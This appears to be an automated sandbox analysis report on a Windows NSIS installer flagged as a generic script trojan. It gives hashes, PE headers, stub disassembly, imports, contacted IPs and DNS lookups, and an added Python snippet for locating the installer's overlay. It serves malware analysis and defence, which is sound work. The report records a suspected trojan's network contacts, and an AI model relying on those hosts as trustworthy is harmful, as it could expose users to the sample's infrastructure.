                                                                    Entropy (8bit):4.283088322451805
                                                                    Encrypted:false
                                                                    SSDEEP:3:YWVbSZAjMx/ALfnH4JaGqx41n:YWNlDGn
                                                                    MD5:329622F40165883B656ABAB0D93674C4
                                                                    SHA1:DD0DDF3B58BA7BF841B7664F890C65DC7B20CE87
                                                                    SHA-256:2A2BF0F32B2E88B7394AB518C2EF85880824317076DCE7E932BB8C9B8F218488
                                                                    SHA-512:BF9173F47118D3FD466378CA186B74EFB7481AF15AEABD0BDBA43331721D93F5F9E4D1FD94F38873B8DBA9352D2EB4BF8044A21C52A52409615E3E25894393CF
                                                                    Malicious:false
                                                                    Preview:{"spellcheck":{"dictionaries":["en-GB"],"dictionary":""}}
                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                    Entropy (8bit):7.999986009226097
                                                                    TrID:
                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                    File name:SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File size:69'484'987 bytes
                                                                    MD5:a4590450863f13aa67198ec0fe52453e
                                                                    SHA1:7bc926cf52aa4c390cb7d6ac5756a9b95f6e8fb2
                                                                    SHA256:d5628dd0e0710c14d9241a3eb0871dfa4fccf0888f6503d8b9a794cb5e8e6d71
                                                                    SHA512:d1311c150ebd9ad70998d3fd729e43ba9a86eac83f7e2686d0bcc5b95a9d0b7847d95c3c3ffae781048041d630ba9d7bc0d48ee66b37cfa483e7f65e179d4430
                                                                    SSDEEP:1572864:GrziNx5qUJsrnLn3ttl5lWSehqFfIxi+blIowRjnMUlS/tf/7:5x5qUJsrL3t5lWTjigwRjnBQ/9/7
                                                                    TLSH:FCE733D09FE8B517C3CC29FE58C4D7F23D9AD7A195B7D062A26524A3F68305D8A40C8B
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L......\.................h...8...@.
                                                                    Icon Hash:62ceac86b2868eb2
                                                                    Entrypoint:0x40338f
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0x5C157F86 [Sat Dec 15 22:26:14 2018 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:4
                                                                    OS Version Minor:0
                                                                    File Version Major:4
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:4
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:b34f154ec913d2d2c435cbd644e91687
                                                                    Instruction
                                                                    sub esp, 000002D4h
                                                                    push ebx
                                                                    push esi
                                                                    push edi
                                                                    push 00000020h
                                                                    pop edi
                                                                    xor ebx, ebx
                                                                    push 00008001h
                                                                    mov dword ptr [esp+14h], ebx
                                                                    mov dword ptr [esp+10h], 0040A2E0h
                                                                    mov dword ptr [esp+1Ch], ebx
                                                                    call dword ptr [004080A8h]
                                                                    call dword ptr [004080A4h]
                                                                    and eax, BFFFFFFFh
                                                                    cmp ax, 00000006h
                                                                    mov dword ptr [0047AEECh], eax
                                                                    je 00007F71A8B52FF3h
                                                                    push ebx
                                                                    call 00007F71A8B562A5h
                                                                    cmp eax, ebx
                                                                    je 00007F71A8B52FE9h
                                                                    push 00000C00h
                                                                    call eax
                                                                    mov esi, 004082B0h
                                                                    push esi
                                                                    call 00007F71A8B5621Fh
                                                                    push esi
                                                                    call dword ptr [00408150h]
                                                                    lea esi, dword ptr [esi+eax+01h]
                                                                    cmp byte ptr [esi], 00000000h
                                                                    jne 00007F71A8B52FCCh
                                                                    push 0000000Ah
                                                                    call 00007F71A8B56278h
                                                                    push 00000008h
                                                                    call 00007F71A8B56271h
                                                                    push 00000006h
                                                                    mov dword ptr [0047AEE4h], eax
                                                                    call 00007F71A8B56265h
                                                                    cmp eax, ebx
                                                                    je 00007F71A8B52FF1h
                                                                    push 0000001Eh
                                                                    call eax
                                                                    test eax, eax
                                                                    je 00007F71A8B52FE9h
                                                                    or byte ptr [0047AEEFh], 00000040h
                                                                    push ebp
                                                                    call dword ptr [00408044h]
                                                                    push ebx
                                                                    call dword ptr [004082A0h]
                                                                    mov dword ptr [0047AFB8h], eax
                                                                    push ebx
                                                                    lea eax, dword ptr [esp+34h]
                                                                    push 000002B4h
                                                                    push eax
                                                                    push ebx
                                                                    push 00440208h
                                                                    call dword ptr [00408188h]
                                                                    push 0040A2C8h
                                                                    Programming Language:
                                                                    • [EXP] VC++ 6.0 SP5 build 8804
                                                                    Name                                  Virtual Address  Virtual Size  Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT          0x8610           0xa0          .rdata
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE        0x10b000         0x4568        .rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC       0x0              0x0
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                                                    IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                                                    IMAGE_DIRECTORY_ENTRY_IAT             0x8000           0x2b0         .rdata
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
                                                                    Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type  Entropy            Characteristics
                                                                    .text   0x1000           0x6627        0x6800    7618d4c0cd8bb67ea9595b4266b3a91f  False     0.6646259014423077  data       6.450282348506287  IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                    .rdata  0x8000           0x14a2        0x1600    eecac1fed9cc6b447d50940d178404d8  False     0.4405184659090909  data       5.025178929113415  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .data   0xa000           0x70ff8       0x600     db8f31a08a2242d80c29e1f9500c6527  False     0.5182291666666666  data       4.037117731448378  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                    .ndata  0x7b000          0x90000       0x0       d41d8cd98f00b204e9800998ecf8427e  False     0                   empty      0.0                IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                    .rsrc   0x10b000         0x4568        0x4600    1b3165e64c8066127e58ce26cb8cd015  False     0.9090959821428571  data       7.707647483876318  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
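The section table above accounts for well under 100 KB of raw data (0x6800 + 0x1600 + 0x600 + 0x4600 bytes plus headers) in a 69,484,987-byte file whose overall entropy is 7.99999: for a Nullsoft self-extracting archive that is the expected picture, with the compressed installer payload sitting in the overlay after the last section. The Python below is an added example for this report, not Joe Sandbox code: it reads the section headers of a PE32 file and reports where the overlay starts and how much of the file it is. Because the report does not print raw file offsets, `build_stub_pe()` constructs a stand-in image from the report's section names and sizes, laying sections out back to back after a 0x200-byte header (an assumption; a real NSIS stub may use 0x400, which shifts the boundary by a few hundred bytes and does not change the result) with a constructed overlay in place of the real payload. `overlay_offset()` works unchanged on the actual sample.

```python
"""Locate the overlay (bytes past the last section) of a PE32 file."""
import struct

# (name, VirtualAddress, VirtualSize, SizeOfRawData), as listed in the report.
REPORT_SECTIONS = [
    (b".text",  0x1000,   0x6627,  0x6800),
    (b".rdata", 0x8000,   0x14a2,  0x1600),
    (b".data",  0xa000,   0x70ff8, 0x600),
    (b".ndata", 0x7b000,  0x90000, 0x0),      # NSIS scratch area: no bytes on disk
    (b".rsrc",  0x10b000, 0x4568,  0x4600),
]
REPORT_FILE_SIZE = 69_484_987                 # "File size" from the report

HEADERS_SIZE = 0x200                          # assumed SizeOfHeaders for the stub
SECTION_HDR = "<8sIIIIIIHHI"                  # IMAGE_SECTION_HEADER, 40 bytes


def build_stub_pe(sections, overlay: bytes) -> bytes:
    """Constructed PE32 image: DOS header, PE/COFF headers, zero-filled sections, overlay."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                           # e_lfanew
    # Machine i386, N sections, no timestamp/symbols, 0xE0-byte optional header,
    # characteristics 0x010F = RELOCS_STRIPPED|EXECUTABLE|LINE_NUMS_STRIPPED|LOCAL_SYMS_STRIPPED|32BIT
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0xE0, 0x010F)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                              # PE32 magic
    hdrs = bytearray()
    body = bytearray()
    raw_ptr = HEADERS_SIZE
    for name, va, vsize, rawsize in sections:
        ptr = raw_ptr if rawsize else 0                                # uninitialised data has no file bytes
        hdrs += struct.pack(SECTION_HDR, name, vsize, va, rawsize, ptr, 0, 0, 0, 0, 0)
        body += bytes(rawsize)                                         # contents irrelevant for the layout check
        raw_ptr += rawsize
    head = bytes(dos) + b"PE\0\0" + coff + bytes(opt) + bytes(hdrs)
    if len(head) > HEADERS_SIZE:
        raise ValueError("too many sections for a %#x-byte header" % HEADERS_SIZE)
    return head.ljust(HEADERS_SIZE, b"\0") + bytes(body) + overlay


def overlay_offset(data: bytes) -> int:
    """File offset where the overlay starts: the end of the highest raw section."""
    if data[:2] != b"MZ":
        raise ValueError("not a DOS/PE file")
    e_lfanew, = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    nsec, = struct.unpack_from("<H", data, e_lfanew + 6)                # NumberOfSections
    opt_size, = struct.unpack_from("<H", data, e_lfanew + 20)           # SizeOfOptionalHeader
    sec_off = e_lfanew + 24 + opt_size
    end = 0
    for i in range(nsec):
        _, _, _, rawsize, rawptr = struct.unpack_from("<8sIIII", data, sec_off + 40 * i)
        if rawsize:                                                     # skip BSS-style sections
            end = max(end, rawptr + rawsize)
    return end


def overlay_report(data: bytes) -> dict:
    """Overlay offset, size and share of the whole file."""
    start = overlay_offset(data)
    return {
        "overlay_offset": start,
        "overlay_size": len(data) - start,
        "overlay_fraction": (len(data) - start) / len(data),
    }


def report_sample_estimate() -> dict:
    """Apply the stub's layout to the report's file size (an estimate, see lead-in)."""
    end = overlay_offset(build_stub_pe(REPORT_SECTIONS, b""))
    return {"image_end": end, "overlay_size": REPORT_FILE_SIZE - end,
            "overlay_fraction": (REPORT_FILE_SIZE - end) / REPORT_FILE_SIZE}


if __name__ == "__main__":
    sample = build_stub_pe(REPORT_SECTIONS, b"NSIS payload stand-in " * 64)   # constructed overlay
    print(overlay_report(sample))
    print(report_sample_estimate())
```

With the report's numbers the PE image ends around 0xCC00 and more than 99.9% of the file is overlay; on the real sample the offset returned by `overlay_offset()` is where to carve the NSIS archive (7-Zip can then list the files it drops) instead of running it.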
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x10b1d8 | 0x3b71 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9826509824538345
RT_DIALOG | 0x10ed50 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x10ee50 | 0xf8 | data | English | United States | 0.6330645161290323
RT_DIALOG | 0x10ef48 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x10efa8 | 0x14 | data | English | United States | 1.05
RT_VERSION | 0x10efc0 | 0x268 | MS Windows COFF Motorola 68000 object file | English | United States | 0.474025974025974
RT_MANIFEST | 0x10f228 | 0x33e | XML 1.0 document, ASCII text, with very long lines (830), with no line terminators | English | United States | 0.5542168674698795
DLL | Import
KERNEL32.dll | SetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
USER32.dll | GetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll | SHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
ADVAPI32.dll | AdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                    Aug 4, 2024 16:24:46.709168911 CEST49727443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:24:46.784781933 CEST49727443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:24:46.784898043 CEST4434972799.81.234.0192.168.2.7
                                                                    Aug 4, 2024 16:24:46.784965992 CEST49727443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:24:50.091876984 CEST49728443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:24:50.091922045 CEST4434972899.81.234.0192.168.2.7
                                                                    Aug 4, 2024 16:24:50.091995955 CEST49728443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:24:50.092288971 CEST49728443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:24:50.092305899 CEST4434972899.81.234.0192.168.2.7
                                                                    Aug 4, 2024 16:24:50.709750891 CEST4434972899.81.234.0192.168.2.7
                                                                    Aug 4, 2024 16:24:50.710448027 CEST49728443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:24:50.710472107 CEST4434972899.81.234.0192.168.2.7
                                                                    Aug 4, 2024 16:24:50.714210033 CEST4434972899.81.234.0192.168.2.7
                                                                    Aug 4, 2024 16:24:50.714382887 CEST49728443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:24:50.716727018 CEST49728443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:24:50.716866016 CEST4434972899.81.234.0192.168.2.7
                                                                    Aug 4, 2024 16:24:50.717008114 CEST49728443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:24:59.261526108 CEST49729443192.168.2.752.30.21.185
                                                                    Aug 4, 2024 16:24:59.261576891 CEST4434972952.30.21.185192.168.2.7
                                                                    Aug 4, 2024 16:24:59.261650085 CEST49729443192.168.2.752.30.21.185
                                                                    Aug 4, 2024 16:24:59.325301886 CEST49729443192.168.2.752.30.21.185
                                                                    Aug 4, 2024 16:24:59.325320005 CEST4434972952.30.21.185192.168.2.7
                                                                    Aug 4, 2024 16:25:00.091890097 CEST4434972952.30.21.185192.168.2.7
                                                                    Aug 4, 2024 16:25:00.092900038 CEST49729443192.168.2.752.30.21.185
                                                                    Aug 4, 2024 16:25:00.092940092 CEST4434972952.30.21.185192.168.2.7
                                                                    Aug 4, 2024 16:25:00.096462965 CEST4434972952.30.21.185192.168.2.7
                                                                    Aug 4, 2024 16:25:00.096587896 CEST49729443192.168.2.752.30.21.185
                                                                    Aug 4, 2024 16:25:00.098007917 CEST49729443192.168.2.752.30.21.185
                                                                    Aug 4, 2024 16:25:00.098094940 CEST4434972952.30.21.185192.168.2.7
                                                                    Aug 4, 2024 16:25:00.098207951 CEST49729443192.168.2.752.30.21.185
                                                                    Aug 4, 2024 16:25:01.067370892 CEST49730443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:25:01.067420006 CEST4434973099.81.234.0192.168.2.7
                                                                    Aug 4, 2024 16:25:01.067521095 CEST49730443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:25:01.067879915 CEST49730443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:25:01.067898035 CEST4434973099.81.234.0192.168.2.7
                                                                    Aug 4, 2024 16:25:01.916265011 CEST4434973099.81.234.0192.168.2.7
                                                                    Aug 4, 2024 16:25:01.916706085 CEST49730443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:25:01.916728020 CEST4434973099.81.234.0192.168.2.7
                                                                    Aug 4, 2024 16:25:01.917738914 CEST4434973099.81.234.0192.168.2.7
                                                                    Aug 4, 2024 16:25:01.917799950 CEST49730443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:25:01.918572903 CEST49730443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:25:01.918606043 CEST4434973099.81.234.0192.168.2.7
                                                                    Aug 4, 2024 16:25:01.918662071 CEST49730443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:25:05.082562923 CEST49731443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:25:05.082606077 CEST4434973199.81.234.0192.168.2.7
                                                                    Aug 4, 2024 16:25:05.082698107 CEST49731443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:25:05.083065033 CEST49731443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:25:05.083077908 CEST4434973199.81.234.0192.168.2.7
                                                                    Aug 4, 2024 16:25:05.701628923 CEST4434973199.81.234.0192.168.2.7
                                                                    Aug 4, 2024 16:25:05.754247904 CEST49731443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:25:05.770168066 CEST49731443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:25:05.770194054 CEST4434973199.81.234.0192.168.2.7
                                                                    Aug 4, 2024 16:25:05.773863077 CEST4434973199.81.234.0192.168.2.7
                                                                    Aug 4, 2024 16:25:05.773895025 CEST4434973199.81.234.0192.168.2.7
                                                                    Aug 4, 2024 16:25:05.773966074 CEST49731443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:25:05.816696882 CEST49731443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:25:06.278117895 CEST49731443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:25:06.278270006 CEST4434973199.81.234.0192.168.2.7
                                                                    Aug 4, 2024 16:25:06.278354883 CEST49731443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:25:14.075875998 CEST49732443192.168.2.73.222.214.216
                                                                    Aug 4, 2024 16:25:14.075911045 CEST443497323.222.214.216192.168.2.7
                                                                    Aug 4, 2024 16:25:14.076008081 CEST49732443192.168.2.73.222.214.216
                                                                    Aug 4, 2024 16:25:14.076667070 CEST49732443192.168.2.73.222.214.216
                                                                    Aug 4, 2024 16:25:14.076677084 CEST443497323.222.214.216192.168.2.7
                                                                    Aug 4, 2024 16:25:14.784677982 CEST443497323.222.214.216192.168.2.7
                                                                    Aug 4, 2024 16:25:14.785115004 CEST49732443192.168.2.73.222.214.216
                                                                    Aug 4, 2024 16:25:14.785134077 CEST443497323.222.214.216192.168.2.7
                                                                    Aug 4, 2024 16:25:14.786781073 CEST443497323.222.214.216192.168.2.7
                                                                    Aug 4, 2024 16:25:14.786850929 CEST49732443192.168.2.73.222.214.216
                                                                    Aug 4, 2024 16:25:14.787656069 CEST49732443192.168.2.73.222.214.216
                                                                    Aug 4, 2024 16:25:14.787702084 CEST443497323.222.214.216192.168.2.7
                                                                    Aug 4, 2024 16:25:14.787764072 CEST49732443192.168.2.73.222.214.216
                                                                    Aug 4, 2024 16:25:16.089118004 CEST49733443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:25:16.089179993 CEST4434973399.81.234.0192.168.2.7
                                                                    Aug 4, 2024 16:25:16.089262962 CEST49733443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:25:16.089644909 CEST49733443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:25:16.089664936 CEST4434973399.81.234.0192.168.2.7
                                                                    Aug 4, 2024 16:25:16.718394041 CEST4434973399.81.234.0192.168.2.7
                                                                    Aug 4, 2024 16:25:16.752177000 CEST49733443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:25:16.752214909 CEST4434973399.81.234.0192.168.2.7
                                                                    Aug 4, 2024 16:25:16.755867004 CEST4434973399.81.234.0192.168.2.7
                                                                    Aug 4, 2024 16:25:16.755939007 CEST49733443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:25:16.815624952 CEST49733443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:25:16.815670967 CEST4434973399.81.234.0192.168.2.7
                                                                    Aug 4, 2024 16:25:16.815751076 CEST49733443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:25:20.090670109 CEST49734443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:25:20.090779066 CEST4434973499.81.234.0192.168.2.7
                                                                    Aug 4, 2024 16:25:20.091268063 CEST49734443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:25:20.091268063 CEST49734443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:25:20.091368914 CEST4434973499.81.234.0192.168.2.7
                                                                    Aug 4, 2024 16:25:20.724251986 CEST4434973499.81.234.0192.168.2.7
                                                                    Aug 4, 2024 16:25:20.724961042 CEST49734443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:25:20.725025892 CEST4434973499.81.234.0192.168.2.7
                                                                    Aug 4, 2024 16:25:20.728595972 CEST4434973499.81.234.0192.168.2.7
                                                                    Aug 4, 2024 16:25:20.728718996 CEST49734443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:25:20.729535103 CEST49734443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:25:20.729620934 CEST4434973499.81.234.0192.168.2.7
                                                                    Aug 4, 2024 16:25:20.729751110 CEST49734443192.168.2.799.81.234.0
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 4, 2024 16:23:54.036355972 CEST | 49559 | 53 | 192.168.2.7 | 1.1.1.1
Aug 4, 2024 16:23:54.323359013 CEST | 53 | 49559 | 1.1.1.1 | 192.168.2.7
Aug 4, 2024 16:24:14.057403088 CEST | 61417 | 53 | 192.168.2.7 | 1.1.1.1
Aug 4, 2024 16:24:14.065613985 CEST | 53 | 61417 | 1.1.1.1 | 192.168.2.7
Aug 4, 2024 16:24:16.060534954 CEST | 63553 | 53 | 192.168.2.7 | 1.1.1.1
Aug 4, 2024 16:24:16.067498922 CEST | 53 | 63553 | 1.1.1.1 | 192.168.2.7
Aug 4, 2024 16:24:21.276837111 CEST | 52309 | 53 | 192.168.2.7 | 1.1.1.1
Aug 4, 2024 16:24:21.277036905 CEST | 63414 | 53 | 192.168.2.7 | 1.1.1.1
Aug 4, 2024 16:24:21.287096024 CEST | 53 | 52309 | 1.1.1.1 | 192.168.2.7
Aug 4, 2024 16:24:21.287175894 CEST | 53 | 63414 | 1.1.1.1 | 192.168.2.7
Aug 4, 2024 16:24:21.332416058 CEST | 59143 | 53 | 192.168.2.7 | 1.1.1.1
Aug 4, 2024 16:24:21.332674980 CEST | 55615 | 53 | 192.168.2.7 | 1.1.1.1
Aug 4, 2024 16:24:21.350507975 CEST | 53 | 59143 | 1.1.1.1 | 192.168.2.7
Aug 4, 2024 16:24:21.350742102 CEST | 53 | 55615 | 1.1.1.1 | 192.168.2.7
Aug 4, 2024 16:24:31.064254999 CEST | 53148 | 53 | 192.168.2.7 | 1.1.1.1
Aug 4, 2024 16:24:31.071904898 CEST | 53 | 53148 | 1.1.1.1 | 192.168.2.7
Aug 4, 2024 16:25:14.065884113 CEST | 59883 | 53 | 192.168.2.7 | 1.1.1.1
Aug 4, 2024 16:25:14.073774099 CEST | 53 | 59883 | 1.1.1.1 | 192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Aug 4, 2024 16:23:54.036355972 CEST | 192.168.2.7 | 1.1.1.1 | 0xc615 | Standard query (0) | www.setekshome.com | A (IP address) | IN (0x0001) | false
Aug 4, 2024 16:24:14.057403088 CEST | 192.168.2.7 | 1.1.1.1 | 0xaefb | Standard query (0) | ws-eu.pusher.com | A (IP address) | IN (0x0001) | false
Aug 4, 2024 16:24:16.060534954 CEST | 192.168.2.7 | 1.1.1.1 | 0xe8ae | Standard query (0) | sockjs-eu.pusher.com | A (IP address) | IN (0x0001) | false
Aug 4, 2024 16:24:21.276837111 CEST | 192.168.2.7 | 1.1.1.1 | 0x56c2 | Standard query (0) | chrome.cloudflare-dns.com | A (IP address) | IN (0x0001) | false
Aug 4, 2024 16:24:21.277036905 CEST | 192.168.2.7 | 1.1.1.1 | 0x6b | Standard query (0) | chrome.cloudflare-dns.com | 65 | IN (0x0001) | false
Aug 4, 2024 16:24:21.332416058 CEST | 192.168.2.7 | 1.1.1.1 | 0x736c | Standard query (0) | chrome.cloudflare-dns.com | A (IP address) | IN (0x0001) | false
Aug 4, 2024 16:24:21.332674980 CEST | 192.168.2.7 | 1.1.1.1 | 0x7141 | Standard query (0) | chrome.cloudflare-dns.com | 65 | IN (0x0001) | false
Aug 4, 2024 16:24:31.064254999 CEST | 192.168.2.7 | 1.1.1.1 | 0x1fc | Standard query (0) | sockjs-eu.pusher.com | A (IP address) | IN (0x0001) | false
Aug 4, 2024 16:25:14.065884113 CEST | 192.168.2.7 | 1.1.1.1 | 0x7edd | Standard query (0) | stats.pusher.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Aug 4, 2024 16:23:54.323359013 CEST | 1.1.1.1 | 192.168.2.7 | 0xc615 | No error (0) | www.setekshome.com | setekshome.com | | CNAME (Canonical name) | IN (0x0001) | false
Aug 4, 2024 16:23:54.323359013 CEST | 1.1.1.1 | 192.168.2.7 | 0xc615 | No error (0) | setekshome.com | | 185.111.234.27 | A (IP address) | IN (0x0001) | false
Aug 4, 2024 16:24:14.065613985 CEST | 1.1.1.1 | 192.168.2.7 | 0xaefb | No error (0) | ws-eu.pusher.com | socket-eu-ingress-1850214078.eu-west-1.elb.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false
Aug 4, 2024 16:24:14.065613985 CEST | 1.1.1.1 | 192.168.2.7 | 0xaefb | No error (0) | socket-eu-ingress-1850214078.eu-west-1.elb.amazonaws.com | | 52.30.21.185 | A (IP address) | IN (0x0001) | false
Aug 4, 2024 16:24:14.065613985 CEST | 1.1.1.1 | 192.168.2.7 | 0xaefb | No error (0) | socket-eu-ingress-1850214078.eu-west-1.elb.amazonaws.com | | 52.51.219.31 | A (IP address) | IN (0x0001) | false
